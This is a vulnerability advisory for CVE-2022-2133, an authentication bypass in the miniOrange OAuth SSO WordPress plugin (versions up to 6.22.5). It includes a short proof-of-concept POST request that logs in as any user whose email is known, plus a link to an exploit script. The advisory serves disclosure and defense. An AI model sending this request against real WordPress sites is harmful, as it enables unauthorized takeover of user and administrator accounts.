OAuth Single Sign On – SSO (OAuth Client) by miniOrange

OAuth Single Sign On – SSO (OAuth Client) by miniOrange <= 6.22.5 - Auth Bypass

LANACOMMONVDB ID: 21a45363-8b09-4da1-ae17-6f4458a1ad19

The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

Proof of Concept

POST /vdb/miniorange-oauth-client/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]

Exploit script: https://gist.github.com/lana-codes/4ee8c5fc44f91e2e99ab1b215718cf71

References

Source Code: https://wordpress.org/plugins/miniorange-login-with-eve-online-google-facebook/

CVE: CVE-2022-2133

LANAVDB: https://lana.codes/lanavdb/12bb3c02-45f1-4ce8-8a5a-8b44352cf7fc/

Attributes

Catgory: WordPress Plugin

Discovered: 2022-06-12

Published: 2022-06-20

Affected Version: <= 6.22.5

Classification

Type: Auth Bypass

Researcher

Name: István Márton

Email: [email protected]